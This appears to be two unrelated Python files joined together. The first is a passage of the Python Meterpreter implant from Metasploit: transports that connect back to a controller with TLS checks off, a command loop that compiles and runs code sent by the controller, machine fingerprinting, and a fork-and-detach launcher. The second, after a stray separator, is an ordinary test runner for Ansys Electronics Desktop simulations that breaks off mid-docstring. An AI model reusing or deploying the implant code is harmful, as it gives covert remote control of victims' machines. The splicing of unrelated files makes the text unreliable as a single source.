super(HttpTransport, self).__init__()
opener_args = []
scheme = url.split(':', 1)[0]
if scheme == 'https' and ((sys.version_info[0] == 2 and sys.version_info >= (2, 7, 9)) or sys.version_info >= (3, 4, 3)):
import ssl
ssl_ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ssl_ctx.check_hostname = False
ssl_ctx.verify_mode = ssl.CERT_NONE
opener_args.append(urllib.HTTPSHandler(0, ssl_ctx))
if proxy:
opener_args.append(urllib.ProxyHandler({scheme: proxy}))
opener_args.append(urllib.ProxyBasicAuthHandler())
self.proxy = proxy
opener = urllib.build_opener(*opener_args)
opener.addheaders = []
if user_agent:
opener.addheaders.append(('User-Agent', user_agent))
if http_cookie:
opener.addheaders.append(('Cookie', http_cookie))
if http_referer:
opener.addheaders.append(('Referer', http_referer))
self.user_agent = user_agent
urllib.install_opener(opener)
self.url = url
self._http_request_headers = {'Content-Type': 'application/octet-stream'}
if http_host:
self._http_request_headers['Host'] = http_host
self._first_packet = None
self._empty_cnt = 0
def _activate(self):
return True
self._first_packet = None
packet = self._get_packet()
if packet is None:
return False
self._first_packet = packet
return True
def _get_packet(self):
if self._first_packet:
packet = self._first_packet
self._first_packet = None
return packet
packet = None
xor_key = None
request = urllib.Request(self.url, None, self._http_request_headers)
urlopen_kwargs = {}
if sys.version_info > (2, 6):
urlopen_kwargs['timeout'] = self.communication_timeout
try:
url_h = urllib.urlopen(request, **urlopen_kwargs)
packet = url_h.read()
for _ in range(1):
if packet == '':
break
if len(packet) < PACKET_HEADER_SIZE:
packet = None # looks corrupt
break
xor_key = struct.unpack('BBBB', packet[:PACKET_XOR_KEY_SIZE])
header = xor_bytes(xor_key, packet[:PACKET_HEADER_SIZE])
pkt_length = struct.unpack('>I', header[PACKET_LENGTH_OFF:PACKET_LENGTH_OFF+PACKET_LENGTH_SIZE])[0] - 8
if len(packet) != (pkt_length + PACKET_HEADER_SIZE):
packet = None # looks corrupt
except:
debug_traceback('Failure to receive packet from ' + self.url)
if not packet:
delay = 10 * self._empty_cnt
if self._empty_cnt >= 0:
delay *= 10
self._empty_cnt += 1
time.sleep(float(min(10000, delay)) / 1000)
return packet
self._empty_cnt = 0
return packet
def _send_packet(self, packet):
request = urllib.Request(self.url, packet, self._http_request_headers)
urlopen_kwargs = {}
if sys.version_info > (2, 6):
urlopen_kwargs['timeout'] = self.communication_timeout
url_h = urllib.urlopen(request, **urlopen_kwargs)
response = url_h.read()
def patch_uri_path(self, new_path):
match = re.match(r'https?://[^/]+(/.*$)', self.url)
if match is None:
return False
self.url = self.url[:match.span(1)[0]] + new_path
return True
def tlv_pack_transport_group(self):
trans_group = super(HttpTransport, self).tlv_pack_transport_group()
if self.user_agent:
trans_group += tlv_pack(TLV_TYPE_TRANS_UA, self.user_agent)
if self.proxy:
trans_group += tlv_pack(TLV_TYPE_TRANS_PROXY_HOST, self.proxy)
return trans_group
class TcpTransport(Transport):
def __init__(self, url, socket=None):
super(TcpTransport, self).__init__()
self.url = url
self.socket = socket
self._cleanup_thread = None
self._first_packet = True
def _sock_cleanup(self, sock):
remaining_time = self.communication_timeout
while remaining_time > 0:
iter_start_time = time.time()
if select.select([sock], [], [], remaining_time)[0]:
if len(sock.recv(4096)) == 0:
break
remaining_time -= time.time() - iter_start_time
sock.close()
def _activate(self):
address, port = self.url[6:].rsplit(':', 1)
port = int(port.rstrip('/'))
timeout = max(self.communication_timeout, 30)
if address in ('', '0.0.0.0', '::'):
try:
server_sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
server_sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 0)
except (AttributeError, socket.error):
server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_sock.bind(('', port))
server_sock.listen(1)
if not select.select([server_sock], [], [], timeout)[0]:
server_sock.close()
return False
sock, _ = server_sock.accept()
server_sock.close()
else:
if ':' in address:
sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
else:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(timeout)
sock.connect((address, port))
sock.settimeout(None)
self.socket = sock
self._first_packet = True
return True
def _deactivate(self):
cleanup = threading.Thread(target=self._sock_cleanup, args=(self.socket,))
cleanup.run()
self.socket = None
def _get_packet(self):
first = self._first_packet
self._first_packet = False
if not select.select([self.socket], [], [], 0.5)[0]:
return bytes()
packet = self.socket.recv(PACKET_HEADER_SIZE)
if packet == '': # remote is closed
self.request_retire = True
return None
if len(packet) != PACKET_HEADER_SIZE:
if first and len(packet) == 4:
received = 0
header = packet[:4]
pkt_length = struct.unpack('>I', header)[0]
self.socket.settimeout(max(self.communication_timeout, 30))
while received < pkt_length:
received += len(self.socket.recv(pkt_length - received))
self.socket.settimeout(None)
return self._get_packet()
return None
xor_key = struct.unpack('BBBB', packet[:PACKET_XOR_KEY_SIZE])
# XOR the whole header first
header = xor_bytes(xor_key, packet[:PACKET_HEADER_SIZE])
# Extract just the length
pkt_length = struct.unpack('>I', header[PACKET_LENGTH_OFF:PACKET_LENGTH_OFF+PACKET_LENGTH_SIZE])[0]
pkt_length -= 8
# Read the rest of the packet
rest = bytes()
while len(rest) < pkt_length:
rest += self.socket.recv(pkt_length - len(rest))
# return the whole packet, as it's decoded separately
return packet + rest
def _send_packet(self, packet):
self.socket.send(packet)
@classmethod
def from_socket(cls, sock):
url = 'tcp://'
address, port = sock.getsockname()[:2]
# this will need to be changed if the bind stager ever supports binding to a specific address
if not address in ('', '0.0.0.0', '::'):
address, port = sock.getpeername()[:2]
url += address + ':' + str(port)
return cls(url, sock)
class PythonMeterpreter(object):
def __init__(self, transport):
self.transport = transport
self._transport_sleep = None
self.running = False
self.last_registered_extension = None
self.extension_functions = {}
self.channels = {}
self.next_channel_id = 1
self.interact_channels = []
self.processes = {}
self.next_process_id = 1
self.transports = [self.transport]
self.session_expiry_time = SESSION_EXPIRATION_TIMEOUT
self.session_expiry_end = time.time() + self.session_expiry_time
for func in list(filter(lambda x: x.startswith('_core'), dir(self))):
self.extension_functions[func[1:]] = getattr(self, func)
self.running = True
def register_extension(self, extension_name):
self.last_registered_extension = extension_name
return self.last_registered_extension
def register_function(self, func):
self.extension_functions[func.__name__] = func
return func
def register_function_if(self, condition):
if condition:
return self.register_function
else:
return lambda function: function
def register_function_windll(self, func):
if has_windll:
self.register_function(func)
return func
def add_channel(self, channel):
if not isinstance(channel, MeterpreterChannel):
debug_print('[-] channel object is not an instance of MeterpreterChannel')
raise TypeError('invalid channel object')
idx = self.next_channel_id
self.channels[idx] = channel
debug_print('[*] added channel id: ' + str(idx) + ' type: ' + channel.__class__.__name__)
self.next_channel_id += 1
return idx
def add_process(self, process):
idx = self.next_process_id
self.processes[idx] = process
debug_print('[*] added process id: ' + str(idx))
self.next_process_id += 1
return idx
def get_packet(self):
pkt = self.transport.get_packet()
if pkt is None and self.transport.should_retire:
self.transport_change()
return pkt
def send_packet(self, packet):
send_succeeded = self.transport.send_packet(packet)
if not send_succeeded and self.transport.should_retire:
self.transport_change()
return send_succeeded
@property
def session_has_expired(self):
if self.session_expiry_time == 0:
return False
return time.time() > self.session_expiry_end
def transport_add(self, new_transport):
new_position = self.transports.index(self.transport)
self.transports.insert(new_position, new_transport)
def transport_change(self, new_transport=None):
if new_transport is None:
new_transport = self.transport_next()
self.transport.deactivate()
debug_print('[*] changing transport to: ' + new_transport.url)
while not new_transport.activate():
new_transport = self.transport_next(new_transport)
debug_print('[*] changing transport to: ' + new_transport.url)
self.transport = new_transport
def transport_next(self, current_transport=None):
if current_transport is None:
current_transport = self.transport
new_idx = self.transports.index(current_transport) + 1
if new_idx == len(self.transports):
new_idx = 0
return self.transports[new_idx]
def transport_prev(self, current_transport=None):
if current_transport is None:
current_transport = self.transport
new_idx = self.transports.index(current_transport) - 1
if new_idx == -1:
new_idx = len(self.transports) - 1
return self.transports[new_idx]
def run(self):
while self.running and not self.session_has_expired:
request = self.get_packet()
if request:
response = self.create_response(request)
if response:
self.send_packet(response)
if self._transport_sleep:
self.transport.deactivate()
time.sleep(self._transport_sleep)
self._transport_sleep = None
if not self.transport.activate():
self.transport_change()
continue
# iterate over the keys because self.channels could be modified if one is closed
channel_ids = list(self.channels.keys())
for channel_id in channel_ids:
channel = self.channels[channel_id]
data = bytes()
write_request_parts = []
if isinstance(channel, MeterpreterProcess):
if not channel_id in self.interact_channels:
continue
proc_h = channel.proc_h
if proc_h.stderr_reader.is_read_ready():
data = proc_h.stderr_reader.read()
elif proc_h.stdout_reader.is_read_ready():
data = proc_h.stdout_reader.read()
elif not channel.is_alive():
self.handle_dead_resource_channel(channel_id)
elif isinstance(channel, MeterpreterSocketTCPClient):
while select.select([channel.fileno()], [], [], 0)[0]:
try:
d = channel.read(1)
except socket.error:
d = bytes()
if len(d) == 0:
self.handle_dead_resource_channel(channel_id)
break
data += d
elif isinstance(channel, MeterpreterSocketTCPServer):
if select.select([channel.fileno()], [], [], 0)[0]:
(client_sock, client_addr) = channel.sock.accept()
server_addr = channel.sock.getsockname()
client_channel_id = self.add_channel(MeterpreterSocketTCPClient(client_sock))
self.send_packet(tlv_pack_request('stdapi_net_tcp_channel_open', [
{'type': TLV_TYPE_CHANNEL_ID, 'value': client_channel_id},
{'type': TLV_TYPE_CHANNEL_PARENTID, 'value': channel_id},
{'type': TLV_TYPE_LOCAL_HOST, 'value': inet_pton(channel.sock.family, server_addr[0])},
{'type': TLV_TYPE_LOCAL_PORT, 'value': server_addr[1]},
{'type': TLV_TYPE_PEER_HOST, 'value': inet_pton(client_sock.family, client_addr[0])},
{'type': TLV_TYPE_PEER_PORT, 'value': client_addr[1]},
]))
elif isinstance(channel, MeterpreterSocketUDPClient):
if select.select([channel.fileno()], [], [], 0)[0]:
try:
data, peer_address = channel.sock.recvfrom(65535)
except socket.error:
self.handle_dead_resource_channel(channel_id)
else:
write_request_parts.extend([
{'type': TLV_TYPE_PEER_HOST, 'value': peer_address[0]},
{'type': TLV_TYPE_PEER_PORT, 'value': peer_address[1]},
])
if data:
write_request_parts.extend([
{'type': TLV_TYPE_CHANNEL_ID, 'value': channel_id},
{'type': TLV_TYPE_CHANNEL_DATA, 'value': data},
{'type': TLV_TYPE_LENGTH, 'value': len(data)},
])
self.send_packet(tlv_pack_request('core_channel_write', write_request_parts))
def handle_dead_resource_channel(self, channel_id):
del self.channels[channel_id]
if channel_id in self.interact_channels:
self.interact_channels.remove(channel_id)
self.send_packet(tlv_pack_request('core_channel_close', [
{'type': TLV_TYPE_CHANNEL_ID, 'value': channel_id},
]))
def _core_set_uuid(self, request, response):
new_uuid = packet_get_tlv(request, TLV_TYPE_UUID)
if new_uuid:
PAYLOAD_UUID = binascii.b2a_hex(new_uuid['value'])
return ERROR_SUCCESS, response
def _core_enumextcmd(self, request, response):
id_start = packet_get_tlv(request, TLV_TYPE_UINT)['value']
id_end = packet_get_tlv(request, TLV_TYPE_LENGTH)['value'] + id_start
for func_name in self.extension_functions.keys():
command_id = cmd_string_to_id(func_name)
if command_id is None:
continue
if id_start < command_id and command_id < id_end:
response += tlv_pack(TLV_TYPE_UINT, command_id)
return ERROR_SUCCESS, response
def _core_get_session_guid(self, request, response):
response += tlv_pack(TLV_TYPE_SESSION_GUID, binascii.a2b_hex(bytes(SESSION_GUID, 'UTF-8')))
return ERROR_SUCCESS, response
def _core_set_session_guid(self, request, response):
new_guid = packet_get_tlv(request, TLV_TYPE_SESSION_GUID)
if new_guid:
SESSION_GUID = binascii.b2a_hex(new_guid['value'])
return ERROR_SUCCESS, response
def _core_machine_id(self, request, response):
serial = ''
machine_name = platform.uname()[1]
if has_windll:
from ctypes import wintypes
k32 = ctypes.windll.kernel32
sys_dir = ctypes.create_unicode_buffer(260)
if not k32.GetSystemDirectoryW(ctypes.byref(sys_dir), 260):
return ERROR_FAILURE_WINDOWS
vol_buf = ctypes.create_unicode_buffer(260)
fs_buf = ctypes.create_unicode_buffer(260)
serial_num = wintypes.DWORD(0)
if not k32.GetVolumeInformationW(ctypes.c_wchar_p(sys_dir.value[:3]),
vol_buf, ctypes.sizeof(vol_buf), ctypes.byref(serial_num), None,
None, fs_buf, ctypes.sizeof(fs_buf)):
return ERROR_FAILURE_WINDOWS
serial_num = serial_num.value
serial = "%04x" % ((serial_num >> 16) & 0xffff) + '-' "%04x" % (serial_num & 0xffff)
else:
serial = get_hdd_label()
response += tlv_pack(TLV_TYPE_MACHINE_ID, "%s:%s" % (serial, machine_name))
return ERROR_SUCCESS, response
def _core_native_arch(self, request, response):
response += tlv_pack(TLV_TYPE_STRING, get_native_arch())
return ERROR_SUCCESS, response
def _core_patch_url(self, request, response):
if not isinstance(self.transport, HttpTransport):
return ERROR_FAILURE, response
new_uri_path = packet_get_tlv(request, TLV_TYPE_TRANS_URL)['value']
if not self.transport.patch_uri_path(new_uri_path):
return ERROR_FAILURE, response
return ERROR_SUCCESS, response
def _core_negotiate_tlv_encryption(self, request, response):
debug_print('[*] Negotiating TLV encryption')
self.transport.aes_key = rand_bytes(32)
self.transport.aes_enabled = False
response += tlv_pack(TLV_TYPE_SYM_KEY_TYPE, ENC_AES256)
der = packet_get_tlv(request, TLV_TYPE_RSA_PUB_KEY)['value'].strip()
debug_print('[*] RSA key: ' + str(binascii.b2a_hex(der)))
debug_print('[*] AES key: ' + hex(met_rsa.b2i(self.transport.aes_key)))
enc_key = met_rsa_encrypt(der, self.transport.aes_key)
debug_print('[*] Encrypted AES key: ' + hex(met_rsa.b2i(enc_key)))
response += tlv_pack(TLV_TYPE_ENC_SYM_KEY, enc_key)
debug_print('[*] TLV encryption sorted')
return ERROR_SUCCESS, response
def _core_loadlib(self, request, response):
data_tlv = packet_get_tlv(request, TLV_TYPE_DATA)
if (data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED:
return ERROR_FAILURE, response
libname = '???'
match = re.search(r'^meterpreter\.register_extension\(\'([a-zA-Z0-9]+)\'\)$', str(data_tlv['value']), re.MULTILINE)
if match is not None:
libname = match.group(1)
self.last_registered_extension = None
symbols_for_extensions = {'meterpreter': self}
symbols_for_extensions.update(EXPORTED_SYMBOLS)
i = code.InteractiveInterpreter(symbols_for_extensions)
i.runcode(compile(data_tlv['value'], 'ext_server_' + libname + '.py', 'exec'))
extension_name = self.last_registered_extension
if extension_name:
check_extension = lambda x: x.startswith(extension_name)
lib_methods = list(filter(check_extension, list(self.extension_functions.keys())))
for method in lib_methods:
response += tlv_pack(TLV_TYPE_UINT, cmd_string_to_id(method))
return ERROR_SUCCESS, response
def _core_shutdown(self, request, response):
response += tlv_pack(TLV_TYPE_BOOL, True)
self.running = False
return ERROR_SUCCESS, response
def _core_transport_add(self, request, response):
new_transport = Transport.from_request(request)
self.transport_add(new_transport)
return ERROR_SUCCESS, response
def _core_transport_change(self, request, response):
new_transport = Transport.from_request(request)
self.transport_add(new_transport)
self.send_packet(response + tlv_pack(TLV_TYPE_RESULT, ERROR_SUCCESS))
self.transport_change(new_transport)
return None
def _core_transport_list(self, request, response):
if self.session_expiry_time > 0:
response += tlv_pack(TLV_TYPE_TRANS_SESSION_EXP, self.session_expiry_end - time.time())
response += tlv_pack(TLV_TYPE_TRANS_GROUP, self.transport.tlv_pack_transport_group())
transport = self.transport_next()
while transport != self.transport:
response += tlv_pack(TLV_TYPE_TRANS_GROUP, transport.tlv_pack_transport_group())
transport = self.transport_next(transport)
return ERROR_SUCCESS, response
def _core_transport_next(self, request, response):
new_transport = self.transport_next()
if new_transport == self.transport:
return ERROR_FAILURE, response
self.send_packet(response + tlv_pack(TLV_TYPE_RESULT, ERROR_SUCCESS))
self.transport_change(new_transport)
return None
def _core_transport_prev(self, request, response):
new_transport = self.transport_prev()
if new_transport == self.transport:
return ERROR_FAILURE, response
self.send_packet(response + tlv_pack(TLV_TYPE_RESULT, ERROR_SUCCESS))
self.transport_change(new_transport)
return None
def _core_transport_remove(self, request, response):
url = packet_get_tlv(request, TLV_TYPE_TRANS_URL)['value']
if self.transport.url == url:
return ERROR_FAILURE, response
transport_found = False
for transport in self.transports:
if transport.url == url:
transport_found = True
break
if transport_found:
self.transports.remove(transport)
return ERROR_SUCCESS, response
return ERROR_FAILURE, response
def _core_transport_set_timeouts(self, request, response):
timeout_value = packet_get_tlv(request, TLV_TYPE_TRANS_SESSION_EXP).get('value')
if not timeout_value is None:
self.session_expiry_time = timeout_value
self.session_expiry_end = time.time() + self.session_expiry_time
timeout_value = packet_get_tlv(request, TLV_TYPE_TRANS_COMM_TIMEOUT).get('value')
if timeout_value:
self.transport.communication_timeout = timeout_value
retry_value = packet_get_tlv(request, TLV_TYPE_TRANS_RETRY_TOTAL).get('value')
if retry_value:
self.transport.retry_total = retry_value
retry_value = packet_get_tlv(request, TLV_TYPE_TRANS_RETRY_WAIT).get('value')
if retry_value:
self.transport.retry_wait = retry_value
if self.session_expiry_time > 0:
response += tlv_pack(TLV_TYPE_TRANS_SESSION_EXP, self.session_expiry_end - time.time())
response += self.transport.tlv_pack_timeouts()
return ERROR_SUCCESS, response
def _core_transport_sleep(self, request, response):
seconds = packet_get_tlv(request, TLV_TYPE_TRANS_COMM_TIMEOUT)['value']
self.send_packet(response + tlv_pack(TLV_TYPE_RESULT, ERROR_SUCCESS))
if seconds:
self._transport_sleep = seconds
return ERROR_SUCCESS, response
def _core_channel_open(self, request, response):
channel_type = packet_get_tlv(request, TLV_TYPE_CHANNEL_TYPE)
handler = 'channel_open_' + channel_type['value']
if handler not in self.extension_functions:
debug_print('[-] core_channel_open missing handler: ' + handler)
return error_result(NotImplementedError), response
debug_print('[*] core_channel_open dispatching to handler: ' + handler)
handler = self.extension_functions[handler]
return handler(request, response)
def _core_channel_close(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
status, response = channel.core_close(request, response)
if status == ERROR_SUCCESS:
del self.channels[channel_id]
if channel_id in self.interact_channels:
self.interact_channels.remove(channel_id)
debug_print('[*] closed and removed channel id: ' + str(channel_id))
return status, response
def _core_channel_eof(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
status, response = channel.core_eof(request, response)
return ERROR_SUCCESS, response
def _core_channel_interact(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
toggle = packet_get_tlv(request, TLV_TYPE_BOOL)['value']
if toggle:
if channel_id in self.interact_channels:
self.interact_channels.remove(channel_id)
else:
self.interact_channels.append(channel_id)
elif channel_id in self.interact_channels:
self.interact_channels.remove(channel_id)
return ERROR_SUCCESS, response
def _core_channel_read(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
status, response = channel.core_read(request, response)
if not channel.is_alive():
self.handle_dead_resource_channel(channel_id)
return status, response
def _core_channel_write(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
status = ERROR_FAILURE
if channel.is_alive():
status, response = channel.core_write(request, response)
# evaluate channel.is_alive() twice because it could have changed
if not channel.is_alive():
self.handle_dead_resource_channel(channel_id)
return status, response
def create_response(self, request):
response = struct.pack('>I', PACKET_TYPE_RESPONSE)
commd_id_tlv = packet_get_tlv(request, TLV_TYPE_COMMAND_ID)
response += tlv_pack(commd_id_tlv)
response += tlv_pack(TLV_TYPE_UUID, binascii.a2b_hex(bytes(PAYLOAD_UUID, 'UTF-8')))
handler_name = cmd_id_to_string(commd_id_tlv['value'])
if handler_name in self.extension_functions:
handler = self.extension_functions[handler_name]
try:
debug_print('[*] running method ' + handler_name)
result = handler(request, response)
if result is None:
debug_print("[-] handler result is none")
return
result, response = result
except Exception:
debug_traceback('[-] method ' + handler_name + ' resulted in an error')
result = error_result()
else:
if result != ERROR_SUCCESS:
debug_print('[-] method ' + handler_name + ' resulted in error: #' + str(result))
else:
debug_print('[-] method ' + handler_name + ' was requested but does not exist')
result = error_result(NotImplementedError)
reqid_tlv = packet_get_tlv(request, TLV_TYPE_REQUEST_ID)
if not reqid_tlv:
debug_print("[-] no request ID found")
return
response += tlv_pack(reqid_tlv)
debug_print("[*] sending response packet")
return response + tlv_pack(TLV_TYPE_RESULT, result)
# PATCH-SETUP-ENCRYPTION #
_try_to_fork = TRY_TO_FORK and hasattr(os, 'fork')
if not _try_to_fork or (_try_to_fork and os.fork() == 0):
if hasattr(os, 'setsid'):
try:
os.setsid()
except OSError:
pass
if HTTP_CONNECTION_URL and has_urllib:
transport = HttpTransport(HTTP_CONNECTION_URL, proxy=HTTP_PROXY, user_agent=HTTP_USER_AGENT,
http_host=HTTP_HOST, http_referer=HTTP_REFERER, http_cookie=HTTP_COOKIE)
else:
# PATCH-SETUP-STAGELESS-TCP-SOCKET #
transport = TcpTransport.from_socket(s)
met = PythonMeterpreter(transport)
# PATCH-SETUP-TRANSPORTS #
met.run()
|
aedt_test_runner.py
|
import argparse
import datetime
import json
import os
import platform
import re
import subprocess
import tempfile
import threading
from contextlib import contextmanager
from distutils.dir_util import copy_tree
from distutils.dir_util import mkpath
from distutils.dir_util import remove_tree
from distutils.file_util import copy_file
from pathlib import Path
from time import sleep
from typing import Any
from typing import Dict
from typing import Iterable
from typing import Iterator
from typing import List
from typing import Optional
from typing import Tuple
from typing import Union
from django import setup as django_setup
from django.conf import settings as django_settings
from django.template.loader import get_template
from aedttest.clusters.job_hosts import get_job_machines
from aedttest.logger import logger
from aedttest.logger import set_logger
from pyaedt import __file__ as _py_aedt_path # isort: skip
MODULE_DIR = Path(__file__).resolve().parent
CWD_DIR = Path.cwd()
# configure Django templates
django_settings.configure(
TEMPLATES=[
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [MODULE_DIR / "static" / "templates"], # if you want the templates from a file
},
]
)
django_setup()
MAIN_PAGE_TEMPLATE = get_template("main.html")
PROJECT_PAGE_TEMPLATE = get_template("project-report.html")
def main() -> None:
"""Main function that is executed by ``flit`` CLI script and by executing this python file."""
try:
cli_args = parse_arguments()
except ValueError as exc:
logger.error(str(exc))
raise SystemExit(1)
aedt_tester = ElectronicsDesktopTester(
version=cli_args.aedt_version,
max_cores=cli_args.max_cores,
max_tasks=cli_args.max_tasks,
config_file=cli_args.config_file,
out_dir=cli_args.out_dir,
save_projects=cli_args.save_sim_data,
only_reference=cli_args.only_reference,
reference_file=cli_args.reference_file,
)
try:
if not cli_args.suppress_validation:
aedt_tester.validate_config()
if cli_args.only_validate:
return
if len(aedt_tester.machines_dict) > 1 and not cli_args.rsm_is_started:
if not cli_args.rsm_path or not os.path.isfile(cli_args.rsm_path):
raise ValueError("Path to RSM service is not provided or wrong")
if platform.system() == "Windows":
raise ValueError("You must start RSM service on Windows manually and enable flag --rsm-is-started")
for machine in aedt_tester.machines_dict:
out = subprocess.check_output(["ssh", machine, f"{cli_args.rsm_path} start"])
logger.debug(f"{machine}: {out.decode().strip()}")
try:
aedt_tester.run()
finally:
if len(aedt_tester.machines_dict) > 1 and not cli_args.rsm_is_started:
for machine in aedt_tester.machines_dict:
out = subprocess.check_output(["ssh", machine, f"{cli_args.rsm_path} stop"])
logger.debug(f"{machine}: {out.decode().strip()}")
except Exception as exc:
logger.exception(str(exc))
class ElectronicsDesktopTester:
def __init__(
self,
version: str,
max_cores: int,
max_tasks: int,
config_file: Union[str, Path],
out_dir: Optional[str],
save_projects: Optional[bool],
only_reference: Optional[bool],
reference_file: Union[str, Path],
) -> None:
logger.info(f"Initialize new Electronics Desktop Test run. Configuration file is {config_file}")
self.version = version
self.max_cores = max_cores
self.max_tasks = max_tasks
self.active_tasks = 0
self.out_dir = Path(out_dir) if out_dir else CWD_DIR
self.results_path = self.out_dir / "results"
self.proj_dir = self.out_dir if save_projects else None
self.only_reference = only_reference
self.reference_data = {}
if not only_reference:
with open(reference_file) as file:
self.reference_data = json.load(file)
self.script = str(MODULE_DIR / "simulation_data.py")
self.script_args = f"--pyaedt-path={Path(_py_aedt_path).parent.parent}"
self.report_data: Dict[str, Any] = {}
self.machines_dict = {machine.hostname: machine.cores for machine in get_job_machines()}
with open(config_file) as file:
self.project_tests_config = json.load(file)
def validate_config(self) -> None:
"""Make quick validation of --config-file [and --reference-file if present].
Checks that distribution is specified correctly and that projects in
reference identical to configuration.
"""
for project_name, config in self.project_tests_config.items():
distribution_config = config["distribution"]
if "parametric_tasks" in distribution_config:
tasks = distribution_config["parametric_tasks"]
cores = distribution_config["cores"]
if not isinstance(tasks, int):
raise KeyError("'parametric_tasks' key must be integer")
if tasks < 1:
raise KeyError("'parametric_tasks' key must be >= 1")
if tasks > cores:
# implicitly checks that cores >= 1
raise KeyError("'parametric_tasks' key must be <= 'cores'")
if cores % tasks != 0:
raise KeyError("'cores' divided by 'parametric_tasks' must be integer")
if not self.only_reference:
if "projects" not in self.reference_data:
raise KeyError("'projects' key is not specified in Reference File")
not_found_in_conf = set(self.reference_data["projects"]) - set(self.project_tests_config)
if not_found_in_conf:
msg = (
f"Following projects defined in reference results: {', '.join(list(not_found_in_conf))}"
", but not specified in current configuration file"
)
raise KeyError(msg)
not_found_in_ref = set(self.project_tests_config) - set(self.reference_data["projects"])
if not_found_in_ref:
msg = (
f"Following projects defined in configuration file: {', '.join(list(not_found_in_ref))}"
", but not found in reference results file"
)
raise KeyError(msg)
logger.info("Configuration validation is successful")
def run(self) -> None:
"""Main function to start test suite."""
self.validate_hardware()
self.initialize_results()
threads_list = []
with mkdtemp_persistent(
persistent=(self.proj_dir is not None), dir=self.proj_dir, prefix=f"{self.version}_"
) as tmp_dir:
for project_name, allocated_machines in self.allocator():
project_config = self.project_tests_config[project_name]
logger.info(f"Start project {project_name}")
copy_dependencies(project_config, tmp_dir)
project_path = copy_proj(project_name, project_config, tmp_dir)
thread_kwargs = {
"project_path": project_path,
"allocated_machines": allocated_machines,
"project_config": project_config,
"project_name": project_name,
}
thread = threading.Thread(target=self.task_runner, daemon=True, kwargs=thread_kwargs)
thread.start()
threads_list.append(thread)
for th in threads_list:
# wait for all threads to finish before delete folder
th.join()
self.render_main_html(finished=True) # make thread-safe render
combined_report_path = self.create_combined_report()
msg = f"Job is completed.\nReference result file is stored under {combined_report_path}"
if not self.only_reference:
msg += f"\nYou can view report by opening in web browser: {self.results_path / 'main.html'}"
logger.info(msg)
def create_combined_report(self) -> Path:
"""Reads all .json files in ``reference_folder`` and dumps it to single file ``'reference_results.json'``.
Returns
-------
Path
Path to the combined .json file.
"""
combined_report_path = self.results_path / "reference_results.json"
combined_data: Dict[str, Any] = {"error_exception": [], "aedt_version": self.version, "projects": {}}
reference_folder = self.results_path / "reference_folder"
if not reference_folder.exists():
raise RuntimeError("Reference results were not generated. Probably projects failed to run")
for json_file in reference_folder.iterdir():
with open(json_file) as file:
single_data = json.load(file)
combined_data["projects"][json_file.stem] = single_data
with open(combined_report_path, "w") as file:
json.dump(combined_data, file, indent=4)
return combined_report_path
def validate_hardware(self) -> None:
"""Validate that we have enough hardware resources to run requested configuration."""
all_cores = [val for val in self.machines_dict.values()]
total_available_cores = sum(all_cores)
max_machine_cores = max(all_cores)
for proj in self.project_tests_config:
proj_cores = self.project_tests_config[proj]["distribution"]["cores"]
if proj_cores > total_available_cores or (
self.project_tests_config[proj]["distribution"].get("single_node", False)
and proj_cores > max_machine_cores
):
raise ValueError(f"{proj} requires {proj_cores} cores. Not enough resources to run")
def initialize_results(self) -> None:
"""Copy static web parts (HTML, CSS, JS).
Mutate ``self.report_data``. Set all projects status to be ``'Queued'``, default link and delta.
"""
if self.results_path.exists():
remove_tree(str(self.results_path))
copy_path_to(str(MODULE_DIR / "static" / "css"), str(self.results_path))
copy_path_to(str(MODULE_DIR / "static" / "js"), str(self.results_path))
self.report_data["all_delta"] = 1 if not self.only_reference else None
self.report_data["projects"] = {}
for project_name, project_config in self.project_tests_config.items():
self.report_data["projects"][project_name] = {
"cores": project_config["distribution"]["cores"],
"status": "queued",
"link": None,
"delta": None,
"time": time_now(),
}
if not self.only_reference:
# initialize integer for proper rendering
self.report_data["projects"][project_name]["delta"] = 0
self.render_main_html()
def render_main_html(self, finished: bool = False) -> None:
"""Renders main report page.
Using ``self.report_data`` updates django template with the data.
Parameters
----------
finished : bool, default=False
When True send a context to stop refreshing the HTML page.
"""
ctx = {
"projects": self.report_data["projects"],
"finished": finished,
"all_delta": self.report_data["all_delta"],
"has_reference": not self.only_reference,
}
data = MAIN_PAGE_TEMPLATE.render(context=ctx)
with open(self.results_path / "main.html", "w") as file:
file.write(data)
def render_project_html(self, project_name: str, project_report: Dict[str, Union[List[Any], int]]) -> None:
"""Renders project report page.
Creates new page if none exists.
Updates django template with XY plots, mesh, etc data.
Parameters
----------
project_name : str
Name of the project to render.
project_report : dict
Data to render on plots.
"""
page_ctx = {
"plots": project_report["plots"],
"project_name": project_name,
"errors": project_report["error_exception"],
"mesh": project_report["mesh"],
"sim_time": project_report["simulation_time"],
"slider_limit": project_report["slider_limit"],
"has_reference": not self.only_reference,
}
data = PROJECT_PAGE_TEMPLATE.render(context=page_ctx)
with open(self.results_path / f"{project_name}.html", "w") as file:
file.write(data)
def task_runner(
self, project_name: str, project_path: str, project_config: Dict[str, Any], allocated_machines: Dict[str, Any]
) -> None:
"""Task runner that is called by each thread.
Mutates ``self.report_data["projects"]`` and ``self.machines_dict``
Calls update of HTML pages status, starts AEDT process, calls render of project_name.html
Parameters
----------
